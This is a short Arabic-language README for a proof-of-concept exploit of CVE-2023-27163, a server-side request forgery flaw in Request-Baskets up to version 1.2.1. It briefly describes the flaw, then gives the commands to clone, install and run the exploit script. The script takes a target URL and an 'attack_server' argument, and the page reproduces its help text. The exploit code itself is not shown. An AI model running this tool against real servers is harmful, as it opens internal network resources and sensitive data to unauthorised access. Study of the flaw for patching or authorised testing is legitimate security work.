
إثبات مفهوم لاستغلال CVE-2023-27163: تزوير الطلبات من جانب الخادم (SSRF) في Request-Baskets الإصدار 1.2.1 عبر طلبات API مصممة بعناية للوصول إلى موارد الشبكة الداخلية.
Request-Baskets v1.2.1 - تزوير الطلب من جانب الخادم (SSRF)
تم اكتشاف أن request-baskets حتى الإصدار v1.2.1 تحتوي على ثغرة تزوير الطلب من جانب الخادم (SSRF) عبر المكون /api/baskets/{name}. تسمح هذه الثغرة للمهاجمين بالوصول إلى موارد الشبكة والمعلومات الحساسة عبر طلب API مصمم خصيصاً.
git clone https://github.com/0xFTW/CVE-2023-27163
cd CVE-2023-27163
pip3 install -r requirements.txt
python3 CVE-2023-27163.py url attack_server
استغلال سكربت Request Baskets
الوسائط الموضعية:
url المسار الرئيسي (/) للخادم (مثال: http://127.0.0.1:5000/)
attack_server ATTACK_SERVER
الخيارات:
-h, --help عرض رسالة المساعدة هذه والخروج